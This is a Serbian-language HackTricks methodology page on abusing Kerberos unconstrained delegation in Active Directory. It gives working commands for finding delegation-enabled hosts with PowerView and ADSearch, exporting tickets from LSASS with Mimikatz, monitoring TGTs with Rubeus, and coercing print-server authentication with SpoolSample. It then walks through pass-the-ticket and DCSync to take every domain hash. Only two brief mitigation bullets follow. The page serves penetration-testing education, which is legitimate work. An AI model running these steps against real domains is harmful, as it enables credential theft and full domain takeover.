hacktricks/windows-hardening/active-directory-methodology/unconstrained-delegation.md
2024-02-10 13:11:20 +00:00

6.1 KiB
Raw Blame History

Neograničeno preusmeravanje

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Neograničeno preusmeravanje

Ovo je funkcija koju Administrator domena može postaviti na bilo koji računar unutar domena. Zatim, svaki put kada se korisnik prijavi na računar, kopija TGT-a tog korisnika će biti poslata unutar TGS-a koji pruža DC i sačuvana u memoriji u LSASS-u. Dakle, ako imate administratorske privilegije na mašini, moći ćete izvući tikete i preuzeti identitet korisnika na bilo kojoj mašini.

Dakle, ako se administrator domena prijavi na računar sa aktiviranom funkcijom "Neograničeno preusmeravanje", i vi imate lokalne administratorske privilegije na toj mašini, moći ćete izvući tiket i preuzeti identitet Administratora domena bilo gde (privilegije domene).

Možete pronaći objekte računara sa ovim atributom proveravajući da li atribut userAccountControl sadrži ADS_UF_TRUSTED_FOR_DELEGATION. To možete uraditi sa LDAP filterom (userAccountControl:1.2.840.113556.1.4.803:=524288), što je ono što powerview radi:

# Lista računara sa neograničenim preusmeravanjem
## Powerview
Get-NetComputer -Unconstrained #DC-ovi uvek se pojavljuju ali nisu korisni za privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Izvoz tiketa sa Mimikatz-om
privilege::debug
sekurlsa::tickets /export #Preporučeni način
kerberos::list /export #Još jedan način

# Prati prijave i izvozi nove tikete
.\Rubeus.exe monitor /targetuser:<korisničko_ime> /interval:10 #Proveri svakih 10s za nove TGT-ove

Učitajte tiket Administratora (ili žrtvenog korisnika) u memoriju sa Mimikatz-om ili Rubeus-om za Pass the Ticket.
Više informacija: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Više informacija o neograničenom preusmeravanju na ired.team.

Prisilna autentifikacija

Ako napadač uspe da kompromituje računar koji je dozvoljen za "Neograničeno preusmeravanje", on može prevariti server za štampu da se automatski prijavi na njega čime se čuva TGT u memoriji servera.
Zatim, napadač može izvršiti napad Pass the Ticket da bi preuzeo identitet korisnika naloga računara za štampu.

Da biste naterali server za štampu da se prijavi na bilo koju mašinu, možete koristiti SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Ako je TGT sa kontrolera domena, možete izvesti napad DCSync i dobiti sve hešove sa kontrolera domena.
Više informacija o ovom napadu na ired.team.

Evo drugih načina da pokušate izazvati autentifikaciju:

{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

Mitigacija

  • Ograničite DA/Admin prijave na određene servise
  • Postavite "Account is sensitive and cannot be delegated" za privilegovane naloge.
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!